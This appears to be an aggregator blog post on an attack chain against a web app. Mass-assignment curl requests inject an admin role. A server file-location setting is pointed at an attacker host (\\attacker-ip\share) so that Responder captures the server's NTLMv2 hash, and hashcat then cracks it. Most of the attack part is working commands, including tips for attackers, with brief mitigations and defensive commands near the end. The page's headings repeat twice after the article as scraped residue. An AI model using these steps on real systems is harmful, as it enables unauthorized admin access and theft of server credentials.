Critical Real-World Vulnerabilities: BAC To NTLM Hash Capture

This article details a high-impact vulnerability chain that allowed the capture of a server’s NTLMv2 hash through Broken Access Control (BAC) and SMB relay techniques. Below is an extended breakdown with practical commands and steps.

Part 1: Enumeration

The target web app had role-based user management. Admins could modify other users, while regular users could only edit their own profiles via PUT /users.

Key Commands:

CURL for User Enumeration:

curl -X GET https://target.com/users -H "Authorization: Bearer <token>"

Check User Permissions:

curl -X PUT https://target.com/users -H "Content-Type: application/json" -d '{"userId": "my-id", "email": "[email protected]"}'

Part 2: Mass Assignment & BAC Exploit

By injecting the `role` parameter, privilege escalation was achieved:

Exploit Payload:

curl -X PUT https://target.com/users -H "Content-Type: application/json" -d '{"userId": "my-id", "role": "admin"}'

Mitigation:

Sanitize input fields on the server side.
Use role validation middleware.

Part 3: Further Enumeration as Admin

Discovered a role management panel, created a `superadmin` role, and assigned full permissions.

Linux Command to Simulate Role Creation:

echo '{"role": "superadmin", "permissions": [""]}' | jq .

Part 4: SMB Relay & NTLMv2 Hash Capture
The `File Location` setting was abused to force SMB authentication:

Steps:

1. Set Up Responder:

sudo responder -I eth0 -wF

2. Trigger SMB Auth:

curl -X POST https://target.com/server-settings -d '{"fileLocation": "\\attacker-ip\share"}'

Expected Responder Output:

[bash] NTLMv2-SSP Hash captured from <target-ip>

Part 5: Hash Cracking (Optional)

Use `hashcat` to crack the NTLMv2 hash:

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

What Undercode Say

This attack chain demonstrates how basic flaws (BAC, insecure role assignment, and SMB misconfigurations) can lead to domain compromise. Key takeaways:
– For Defenders:
– Disable NTLM where possible.
– Enforce strict input validation.
– Monitor SMB outbound connections.
– For Attackers:
– Always test mass assignment.
– Leverage Responder for internal network pivoting.

Relevant Commands for Defense:

 Disable NTLM on Windows 
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LmCompatibilityLevel /t REG_DWORD /d 5 /f

Block SMB outbound via Firewall (Linux) 
sudo iptables -A OUTPUT -p tcp --dport 445 -j DROP

Expected Output:

A captured NTLMv2 hash and potential lateral movement via relay attacks.

References:

Reported By: Florian Ethical – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Critical Real-World Vulnerabilities: BAC to NTLM Hash Capture

Part 1: Enumeration

Key Commands:

Part 2: Mass Assignment & BAC Exploit

Exploit Payload:

Mitigation:

Part 3: Further Enumeration as Admin

Linux Command to Simulate Role Creation:

Steps:

1. Set Up Responder:

2. Trigger SMB Auth:

Expected Responder Output:

Part 5: Hash Cracking (Optional)

Use `hashcat` to crack the NTLMv2 hash:

What Undercode Say

Relevant Commands for Defense:

Expected Output:

Further Reading:

References:

Join Our Cyber World:

Listen to this Post

Part 1: Enumeration

Key Commands:

Part 2: Mass Assignment & BAC Exploit

Exploit Payload:

Mitigation:

Part 3: Further Enumeration as Admin

Linux Command to Simulate Role Creation:

Steps:

1. Set Up Responder:

2. Trigger SMB Auth:

Expected Responder Output:

Part 5: Hash Cracking (Optional)

Use `hashcat` to crack the NTLMv2 hash:

What Undercode Say

Relevant Commands for Defense:

Expected Output:

Further Reading:

References:

Join Our Cyber World:

Related Posts: